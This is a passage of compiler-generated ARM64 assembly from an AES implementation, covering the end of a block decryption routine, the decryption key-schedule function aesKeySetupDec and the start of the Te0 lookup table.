str w12, [sp, #84]
ldr w12, [sp, #64]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #68]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #56]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #60]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #252]
eor w12, w12, w13
ldr w13, [sp, #124]
eor w12, w12, w13
str w12, [sp, #80]
ldr w12, [sp, #60]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #64]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #68]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #56]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #256]
eor w12, w12, w13
ldr w13, [sp, #128]
eor w12, w12, w13
str w12, [sp, #76]
ldr w12, [sp, #56]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #60]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #64]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #68]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #260]
eor w12, w12, w13
ldr w13, [sp, #132]
eor w12, w12, w13
str w12, [sp, #72]
ldr w12, [sp, #84]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #72]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #76]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #80]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #264]
eor w12, w12, w13
ldr w13, [sp, #120]
eor w12, w12, w13
str w12, [sp, #68]
ldr w12, [sp, #80]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #84]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #72]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #76]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #268]
eor w12, w12, w13
ldr w13, [sp, #124]
eor w12, w12, w13
str w12, [sp, #64]
ldr w12, [sp, #76]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #80]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #84]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #72]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #272]
eor w12, w12, w13
ldr w13, [sp, #128]
eor w12, w12, w13
str w12, [sp, #60]
ldr w12, [sp, #72]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #76]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #80]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #84]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #276]
eor w12, w12, w13
ldr w13, [sp, #132]
eor w12, w12, w13
str w12, [sp, #56]
ldr w12, [sp, #68]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #56]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #60]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #64]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #280]
eor w12, w12, w13
ldr w13, [sp, #120]
eor w12, w12, w13
str w12, [sp, #84]
ldr w12, [sp, #64]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #68]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #56]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #60]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #284]
eor w12, w12, w13
ldr w13, [sp, #124]
eor w12, w12, w13
str w12, [sp, #80]
ldr w12, [sp, #60]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #64]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #68]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #56]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #288]
eor w12, w12, w13
ldr w13, [sp, #128]
eor w12, w12, w13
str w12, [sp, #76]
ldr w12, [sp, #56]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #60]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #64]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #68]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #292]
eor w12, w12, w13
ldr w13, [sp, #132]
eor w12, w12, w13
str w12, [sp, #72]
ldr w12, [sp, #84]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #72]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #76]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #80]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #296]
eor w12, w12, w13
ldr w13, [sp, #120]
eor w12, w12, w13
str w12, [sp, #68]
ldr w12, [sp, #80]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #84]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #72]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #76]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #300]
eor w12, w12, w13
ldr w13, [sp, #124]
eor w12, w12, w13
str w12, [sp, #64]
ldr w12, [sp, #76]
lsr w12, w12, #24
ldr w12, [x8, w12, uxtw #2]
ldr w13, [sp, #80]
lsr w13, w13, #16
and w13, w13, #0xff
ldr w13, [x11, w13, uxtw #2]
eor w12, w12, w13
ldr w13, [sp, #84]
lsr w13, w13, #8
and w13, w13, #0xff
ldr w13, [x10, w13, uxtw #2]
eor w12, w12, w13
ldrb w13, [sp, #72]
; kill: def $x13 killed $w13
ldr w13, [x9, x13, lsl #2]
eor w12, w12, w13
ldr w13, [sp, #304]
eor w12, w12, w13
ldr w13, [sp, #128]
eor w12, w12, w13
str w12, [sp, #60]
ldr w12, [sp, #72]
lsr w12, w12, #24
ldr w8, [x8, w12, uxtw #2]
ldr w12, [sp, #76]
lsr w12, w12, #16
and w12, w12, #0xff
ldr w11, [x11, w12, uxtw #2]
eor w8, w8, w11
ldr w11, [sp, #80]
lsr w11, w11, #8
and w11, w11, #0xff
ldr w10, [x10, w11, uxtw #2]
eor w8, w8, w10
ldrb w10, [sp, #84]
; kill: def $x10 killed $w10
ldr w9, [x9, x10, lsl #2]
eor w8, w8, w9
ldr w9, [sp, #308]
eor w8, w8, w9
ldr w9, [sp, #132]
eor w8, w8, w9
str w8, [sp, #56]
ldr w8, [sp, #68]
lsr w8, w8, #24
adrp x9, _Td4@PAGE
add x9, x9, _Td4@PAGEOFF
str x9, [sp, #48] ; 8-byte Folded Spill
ldr w8, [x9, w8, uxtw #2]
and w8, w8, #0xff000000
ldr w10, [sp, #56]
lsr w10, w10, #16
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff0000
eor w8, w8, w10
ldr w10, [sp, #60]
lsr w10, w10, #8
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff00
eor w8, w8, w10
ldrb w10, [sp, #64]
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w10, [x9, x10]
eor w8, w8, w10
ldr w10, [sp, #312]
eor w8, w8, w10
ldr w10, [sp, #136]
eor w8, w8, w10
str w8, [sp, #84]
ldr w8, [sp, #84]
lsr w8, w8, #24
ldr x10, [sp, #88]
strb w8, [x10]
ldr w8, [sp, #84]
lsr w8, w8, #16
ldr x10, [sp, #88]
strb w8, [x10, #1]
ldr w8, [sp, #84]
lsr w8, w8, #8
ldr x10, [sp, #88]
strb w8, [x10, #2]
ldr w8, [sp, #84]
ldr x10, [sp, #88]
strb w8, [x10, #3]
ldr w8, [sp, #64]
lsr w8, w8, #24
ldr w8, [x9, w8, uxtw #2]
and w8, w8, #0xff000000
ldr w10, [sp, #68]
lsr w10, w10, #16
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff0000
eor w8, w8, w10
ldr w10, [sp, #56]
lsr w10, w10, #8
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff00
eor w8, w8, w10
ldrb w10, [sp, #60]
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w10, [x9, x10]
eor w8, w8, w10
ldr w10, [sp, #316]
eor w8, w8, w10
ldr w10, [sp, #140]
eor w8, w8, w10
str w8, [sp, #80]
ldr w8, [sp, #80]
lsr w8, w8, #24
ldr x10, [sp, #88]
strb w8, [x10, #4]
ldr w8, [sp, #80]
lsr w8, w8, #16
ldr x10, [sp, #88]
strb w8, [x10, #5]
ldr w8, [sp, #80]
lsr w8, w8, #8
ldr x10, [sp, #88]
strb w8, [x10, #6]
ldr w8, [sp, #80]
ldr x10, [sp, #88]
strb w8, [x10, #7]
ldr w8, [sp, #60]
lsr w8, w8, #24
ldr w8, [x9, w8, uxtw #2]
and w8, w8, #0xff000000
ldr w10, [sp, #64]
lsr w10, w10, #16
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff0000
eor w8, w8, w10
ldr w10, [sp, #68]
lsr w10, w10, #8
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff00
eor w8, w8, w10
ldrb w10, [sp, #56]
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w10, [x9, x10]
eor w8, w8, w10
ldr w10, [sp, #320]
eor w8, w8, w10
ldr w10, [sp, #144]
eor w8, w8, w10
str w8, [sp, #76]
ldr w8, [sp, #76]
lsr w8, w8, #24
ldr x10, [sp, #88]
strb w8, [x10, #8]
ldr w8, [sp, #76]
lsr w8, w8, #16
ldr x10, [sp, #88]
strb w8, [x10, #9]
ldr w8, [sp, #76]
lsr w8, w8, #8
ldr x10, [sp, #88]
strb w8, [x10, #10]
ldr w8, [sp, #76]
ldr x10, [sp, #88]
strb w8, [x10, #11]
ldr w8, [sp, #56]
lsr w8, w8, #24
ldr w8, [x9, w8, uxtw #2]
and w8, w8, #0xff000000
ldr w10, [sp, #60]
lsr w10, w10, #16
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff0000
eor w8, w8, w10
ldr w10, [sp, #64]
lsr w10, w10, #8
and w10, w10, #0xff
ldr w10, [x9, w10, uxtw #2]
and w10, w10, #0xff00
eor w8, w8, w10
ldrb w10, [sp, #68]
; kill: def $x10 killed $w10
lsl x10, x10, #2
ldrb w9, [x9, x10]
eor w8, w8, w9
ldr w9, [sp, #324]
eor w8, w8, w9
ldr w9, [sp, #148]
eor w8, w8, w9
str w8, [sp, #72]
ldr w8, [sp, #72]
lsr w8, w8, #24
ldr x9, [sp, #88]
strb w8, [x9, #12]
ldr w8, [sp, #72]
lsr w8, w8, #16
ldr x9, [sp, #88]
strb w8, [x9, #13]
ldr w8, [sp, #72]
lsr w8, w8, #8
ldr x9, [sp, #88]
strb w8, [x9, #14]
ldr w8, [sp, #72]
ldr x9, [sp, #88]
strb w8, [x9, #15]
ldur x9, [x29, #-24]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
bl ___stack_chk_fail
LBB2_2:
ldp x29, x30, [sp, #352] ; 16-byte Folded Reload
ldp x28, x27, [sp, #336] ; 16-byte Folded Reload
add sp, sp, #368
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function aesKeySetupDec
_aesKeySetupDec: ; @aesKeySetupDec
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
ldur x0, [x29, #-8]
ldur x1, [x29, #-16]
bl _aesKeySetupEnc
stur w0, [x29, #-20]
str wzr, [sp, #24]
ldur w9, [x29, #-20]
mov w8, #4
mul w8, w8, w9
str w8, [sp, #20]
b LBB3_1
LBB3_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #24]
ldr w9, [sp, #20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_4
b LBB3_2
LBB3_2: ; in Loop: Header=BB3_1 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #24]
ldr w8, [x8, x9, lsl #2]
str w8, [sp, #16]
ldur x8, [x29, #-8]
ldrsw x9, [sp, #20]
ldr w8, [x8, x9, lsl #2]
ldur x9, [x29, #-8]
ldrsw x10, [sp, #24]
str w8, [x9, x10, lsl #2]
ldr w8, [sp, #16]
ldur x9, [x29, #-8]
ldrsw x10, [sp, #20]
str w8, [x9, x10, lsl #2]
ldur x8, [x29, #-8]
ldr w9, [sp, #24]
add w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
str w8, [sp, #16]
ldur x8, [x29, #-8]
ldr w9, [sp, #20]
add w9, w9, #1
ldr w8, [x8, w9, sxtw #2]
ldur x9, [x29, #-8]
ldr w10, [sp, #24]
add w10, w10, #1
str w8, [x9, w10, sxtw #2]
ldr w8, [sp, #16]
ldur x9, [x29, #-8]
ldr w10, [sp, #20]
add w10, w10, #1
str w8, [x9, w10, sxtw #2]
ldur x8, [x29, #-8]
ldr w9, [sp, #24]
add w9, w9, #2
ldr w8, [x8, w9, sxtw #2]
str w8, [sp, #16]
ldur x8, [x29, #-8]
ldr w9, [sp, #20]
add w9, w9, #2
ldr w8, [x8, w9, sxtw #2]
ldur x9, [x29, #-8]
ldr w10, [sp, #24]
add w10, w10, #2
str w8, [x9, w10, sxtw #2]
ldr w8, [sp, #16]
ldur x9, [x29, #-8]
ldr w10, [sp, #20]
add w10, w10, #2
str w8, [x9, w10, sxtw #2]
ldur x8, [x29, #-8]
ldr w9, [sp, #24]
add w9, w9, #3
ldr w8, [x8, w9, sxtw #2]
str w8, [sp, #16]
ldur x8, [x29, #-8]
ldr w9, [sp, #20]
add w9, w9, #3
ldr w8, [x8, w9, sxtw #2]
ldur x9, [x29, #-8]
ldr w10, [sp, #24]
add w10, w10, #3
str w8, [x9, w10, sxtw #2]
ldr w8, [sp, #16]
ldur x9, [x29, #-8]
ldr w10, [sp, #20]
add w10, w10, #3
str w8, [x9, w10, sxtw #2]
b LBB3_3
LBB3_3: ; in Loop: Header=BB3_1 Depth=1
ldr w8, [sp, #24]
add w8, w8, #4
str w8, [sp, #24]
ldr w8, [sp, #20]
subs w8, w8, #4
str w8, [sp, #20]
b LBB3_1
LBB3_4:
mov w8, #1
str w8, [sp, #24]
b LBB3_5
LBB3_5: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #24]
ldur w9, [x29, #-20]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_8
b LBB3_6
LBB3_6: ; in Loop: Header=BB3_5 Depth=1
ldur x8, [x29, #-8]
add x8, x8, #16
stur x8, [x29, #-8]
ldur x8, [x29, #-8]
ldr w8, [x8]
lsr w8, w8, #24
; kill: def $x8 killed $w8
lsl x8, x8, #2
adrp x10, _Te4@PAGE
add x10, x10, _Te4@PAGEOFF
str x10, [sp, #8] ; 8-byte Folded Spill
ldrb w8, [x10, x8]
mov x9, x8
adrp x8, _Td0@PAGE
add x8, x8, _Td0@PAGEOFF
ldr w9, [x8, x9, lsl #2]
ldur x11, [x29, #-8]
ldr w11, [x11]
lsr w11, w11, #16
and w11, w11, #0xff
; kill: def $x11 killed $w11
lsl x11, x11, #2
ldrb w11, [x10, x11]
; kill: def $x11 killed $w11
adrp x12, _Td1@PAGE
add x12, x12, _Td1@PAGEOFF
ldr w11, [x12, x11, lsl #2]
eor w9, w9, w11
ldur x11, [x29, #-8]
ldr w11, [x11]
lsr w11, w11, #8
and w11, w11, #0xff
; kill: def $x11 killed $w11
lsl x11, x11, #2
ldrb w11, [x10, x11]
mov x13, x11
adrp x11, _Td2@PAGE
add x11, x11, _Td2@PAGEOFF
ldr w13, [x11, x13, lsl #2]
eor w13, w9, w13
ldur x9, [x29, #-8]
ldrb w9, [x9]
; kill: def $x9 killed $w9
lsl x9, x9, #2
ldrb w9, [x10, x9]
mov x14, x9
adrp x9, _Td3@PAGE
add x9, x9, _Td3@PAGEOFF
ldr w14, [x9, x14, lsl #2]
eor w13, w13, w14
ldur x14, [x29, #-8]
str w13, [x14]
ldur x13, [x29, #-8]
ldr w13, [x13, #4]
lsr w13, w13, #24
; kill: def $x13 killed $w13
lsl x13, x13, #2
ldrb w13, [x10, x13]
; kill: def $x13 killed $w13
ldr w13, [x8, x13, lsl #2]
ldur x14, [x29, #-8]
ldr w14, [x14, #4]
lsr w14, w14, #16
and w14, w14, #0xff
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x10, x14]
; kill: def $x14 killed $w14
ldr w14, [x12, x14, lsl #2]
eor w13, w13, w14
ldur x14, [x29, #-8]
ldr w14, [x14, #4]
lsr w14, w14, #8
and w14, w14, #0xff
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x10, x14]
; kill: def $x14 killed $w14
ldr w14, [x11, x14, lsl #2]
eor w13, w13, w14
ldur x14, [x29, #-8]
ldrb w14, [x14, #4]
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x10, x14]
; kill: def $x14 killed $w14
ldr w14, [x9, x14, lsl #2]
eor w13, w13, w14
ldur x14, [x29, #-8]
str w13, [x14, #4]
ldur x13, [x29, #-8]
ldr w13, [x13, #8]
lsr w13, w13, #24
; kill: def $x13 killed $w13
lsl x13, x13, #2
ldrb w13, [x10, x13]
; kill: def $x13 killed $w13
ldr w13, [x8, x13, lsl #2]
ldur x14, [x29, #-8]
ldr w14, [x14, #8]
lsr w14, w14, #16
and w14, w14, #0xff
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x10, x14]
; kill: def $x14 killed $w14
ldr w14, [x12, x14, lsl #2]
eor w13, w13, w14
ldur x14, [x29, #-8]
ldr w14, [x14, #8]
lsr w14, w14, #8
and w14, w14, #0xff
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x10, x14]
; kill: def $x14 killed $w14
ldr w14, [x11, x14, lsl #2]
eor w13, w13, w14
ldur x14, [x29, #-8]
ldrb w14, [x14, #8]
; kill: def $x14 killed $w14
lsl x14, x14, #2
ldrb w14, [x10, x14]
; kill: def $x14 killed $w14
ldr w14, [x9, x14, lsl #2]
eor w13, w13, w14
ldur x14, [x29, #-8]
str w13, [x14, #8]
ldur x13, [x29, #-8]
ldr w13, [x13, #12]
lsr w13, w13, #24
; kill: def $x13 killed $w13
lsl x13, x13, #2
ldrb w13, [x10, x13]
; kill: def $x13 killed $w13
ldr w8, [x8, x13, lsl #2]
ldur x13, [x29, #-8]
ldr w13, [x13, #12]
lsr w13, w13, #16
and w13, w13, #0xff
; kill: def $x13 killed $w13
lsl x13, x13, #2
ldrb w13, [x10, x13]
; kill: def $x13 killed $w13
ldr w12, [x12, x13, lsl #2]
eor w8, w8, w12
ldur x12, [x29, #-8]
ldr w12, [x12, #12]
lsr w12, w12, #8
and w12, w12, #0xff
; kill: def $x12 killed $w12
lsl x12, x12, #2
ldrb w12, [x10, x12]
; kill: def $x12 killed $w12
ldr w11, [x11, x12, lsl #2]
eor w8, w8, w11
ldur x11, [x29, #-8]
ldrb w11, [x11, #12]
; kill: def $x11 killed $w11
lsl x11, x11, #2
ldrb w10, [x10, x11]
; kill: def $x10 killed $w10
ldr w9, [x9, x10, lsl #2]
eor w8, w8, w9
ldur x9, [x29, #-8]
str w8, [x9, #12]
b LBB3_7
LBB3_7: ; in Loop: Header=BB3_5 Depth=1
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB3_5
LBB3_8:
ldur w0, [x29, #-20]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.section __TEXT,__const
.p2align 2 ; @Te0
_Te0:
.long 3328402341 ; 0xc66363a5
.long 4168907908 ; 0xf87c7c84
.long 4000806809 ; 0xee777799
.long 4135287693 ; 0xf67b7b8d
.long 4294111757 ; 0xfff2f20d
.long 3597364157 ; 0xd66b6bbd
.long 3731845041 ; 0xde6f6fb1
.long 2445657428 ; 0x91c5c554
.long 1613770832 ; 0x60303050
.long 33620227 ; 0x2010103
.long 3462883241 ; 0xce6767a9
.long 1445669757 ; 0x562b2b7d
.long 3892248089 ; 0xe7fefe19
.long 3050821474 ; 0xb5d7d762
.long 1303096294 ; 0x4dababe6
.long 3967186586 ; 0xec76769a
.long 2412431941 ; 0x8fcaca45
.long 528646813 ; 0x1f82829d
.long 2311702848 ; 0x89c9c940
.long 4202528135 ; 0xfa7d7d87
.long 4026202645 ; 0xeffafa15
.long 2992200171 ; 0xb25959eb
.long 2387036105 ; 0x8e4747c9
.long 4226871307 ; 0xfbf0f00b
.long 1101901292 ; 0x41adadec
.long 3017069671 ; 0xb3d4d467
.long 1604494077 ; 0x5fa2a2fd
.long 1169141738 ; 0x45afafea
.long 597466303 ; 0x239c9cbf
.long 1403299063 ; 0x53a4a4f7
.long 3832705686 ; 0xe4727296
.long 2613100635 ; 0x9bc0c05b
.long 1974974402 ; 0x75b7b7c2
.long 3791519004 ; 0xe1fdfd1c
.long 1033081774 ; 0x3d9393ae
.long 1277568618 ; 0x4c26266a
.long 1815492186 ; 0x6c36365a
.long 2118074177 ; 0x7e3f3f41
.long 4126668546 ; 0xf5f7f702
.long 2211236943 ; 0x83cccc4f
.long 1748251740 ; 0x6834345c
.long 1369810420 ; 0x51a5a5f4
.long 3521504564 ; 0xd1e5e534
.long 4193382664 ; 0xf9f1f108
.long 3799085459 ; 0xe2717193
.long 2883115123 ; 0xabd8d873
.long 1647391059 ; 0x62313153
.long 706024767 ; 0x2a15153f
.long 134480908 ; 0x804040c
.long 2512897874 ; 0x95c7c752
.long 1176707941 ; 0x46232365
.long 2646852446 ; 0x9dc3c35e
.long 806885416 ; 0x30181828
.long 932615841 ; 0x379696a1
.long 168101135 ; 0xa05050f
.long 798661301 ; 0x2f9a9ab5
.long 235341577 ; 0xe070709
.long 605164086 ; 0x24121236
.long 461406363 ; 0x1b80809b
.long 3756188221 ; 0xdfe2e23d
.long 3454790438 ; 0xcdebeb26
.long 1311188841 ; 0x4e272769
.long 2142417613 ; 0x7fb2b2cd
.long 3933566367 ; 0xea75759f
.long 302582043 ; 0x1209091b
.long 495158174 ; 0x1d83839e
.long 1479289972 ; 0x582c2c74
.long 874125870 ; 0x341a1a2e
.long 907746093 ; 0x361b1b2d
.long 3698224818 ; 0xdc6e6eb2
.long 3025820398 ; 0xb45a5aee
.long 1537253627 ; 0x5ba0a0fb
.long 2756858614 ; 0xa45252f6
.long 1983593293 ; 0x763b3b4d
.long 3084310113 ; 0xb7d6d661
.long 2108928974 ; 0x7db3b3ce
.long 1378429307 ; 0x5229297b
.long 3722699582 ; 0xdde3e33e
.long 1580150641 ; 0x5e2f2f71
.long 327451799 ; 0x13848497
.long 2790478837 ; 0xa65353f5
.long 3117535592 ; 0xb9d1d168
.long 0 ; 0x0
.long 3253595436 ; 0xc1eded2c
.long 1075847264 ; 0x40202060
.long 3825007647 ; 0xe3fcfc1f
.long 2041688520 ; 0x79b1b1c8
.long 3059440621 ; 0xb65b5bed
.long 3563743934 ; 0xd46a6abe
.long 2378943302 ; 0x8dcbcb46
.long 1740553945 ; 0x67bebed9
.long 1916352843 ; 0x7239394b
.long 2487896798 ; 0x944a4ade
.long 2555137236 ; 0x984c4cd4
.long 2958579944 ; 0xb05858e8
.long 2244988746 ; 0x85cfcf4a
.long 3151024235 ; 0xbbd0d06b
.long 3320835882 ; 0xc5efef2a
.long 1336584933 ; 0x4faaaae5
.long 3992714006 ; 0xedfbfb16
.long 2252555205 ; 0x864343c5
.long 2588757463 ; 0x9a4d4dd7
.long 1714631509 ; 0x66333355
.long 293963156 ; 0x11858594
.long 2319795663 ; 0x8a4545cf
.long 3925473552 ; 0xe9f9f910
.long 67240454 ; 0x4020206
.long 4269768577 ; 0xfe7f7f81
.long 2689618160 ; 0xa05050f0
.long 2017213508 ; 0x783c3c44
.long 631218106 ; 0x259f9fba
.long 1269344483 ; 0x4ba8a8e3
.long 2723238387 ; 0xa25151f3
.long 1571005438 ; 0x5da3a3fe
.long 2151694528 ; 0x804040c0
.long 93294474 ; 0x58f8f8a
.long 1066570413 ; 0x3f9292ad
.long 563977660 ; 0x219d9dbc
.long 1882732616 ; 0x70383848
.long 4059428100 ; 0xf1f5f504
.long 1673313503 ; 0x63bcbcdf
.long 2008463041 ; 0x77b6b6c1
.long 2950355573 ; 0xafdada75
.long 1109467491 ; 0x42212163
.long 537923632 ; 0x20101030
.long 3858759450 ; 0xe5ffff1a
.long 4260623118 ; 0xfdf3f30e
.long 3218264685 ; 0xbfd2d26d
.long 2177748300 ; 0x81cdcd4c
.long 403442708 ; 0x180c0c14
.long 638784309 ; 0x26131335
.long 3287084079 ; 0xc3ecec2f
.long 3193921505 ; 0xbe5f5fe1
.long 899127202 ; 0x359797a2
.long 2286175436 ; 0x884444cc
.long 773265209 ; 0x2e171739
.long 2479146071 ; 0x93c4c457
.long 1437050866 ; 0x55a7a7f2
.long 4236148354 ; 0xfc7e7e82
.long 2050833735 ; 0x7a3d3d47
.long 3362022572 ; 0xc86464ac
.long 3126681063 ; 0xba5d5de7
.long 840505643 ; 0x3219192b
.long 3866325909 ; 0xe6737395
.long 3227541664 ; 0xc06060a0
.long 427917720 ; 0x19818198
.long 2655997905 ; 0x9e4f4fd1
.long 2749160575 ; 0xa3dcdc7f
.long 1143087718 ; 0x44222266
.long 1412049534 ; 0x542a2a7e
.long 999329963 ; 0x3b9090ab
.long 193497219 ; 0xb888883
.long 2353415882 ; 0x8c4646ca
.long 3354324521 ; 0xc7eeee29
.long 1807268051 ; 0x6bb8b8d3
.long 672404540 ; 0x2814143c
.long 2816401017 ; 0xa7dede79
.long 3160301282 ; 0xbc5e5ee2
.long 369822493 ; 0x160b0b1d
.long 2916866934 ; 0xaddbdb76
.long 3688947771 ; 0xdbe0e03b
.long 1681011286 ; 0x64323256
.long 1949973070 ; 0x743a3a4e
.long 336202270 ; 0x140a0a1e
.long 2454276571 ; 0x924949db
.long 201721354 ; 0xc06060a
.long 1210328172 ; 0x4824246c
.long 3093060836 ; 0xb85c5ce4
.long 2680341085 ; 0x9fc2c25d
.long 3184776046 ; 0xbdd3d36e
.long 1135389935 ; 0x43acacef
.long 3294782118 ; 0xc46262a6
.long 965841320 ; 0x399191a8
.long 831886756 ; 0x319595a4
.long 3554993207 ; 0xd3e4e437
.long 4068047243 ; 0xf279798b
.long 3588745010 ; 0xd5e7e732
.long 2345191491 ; 0x8bc8c843
.long 1849112409 ; 0x6e373759
.long 3664604599 ; 0xda6d6db7
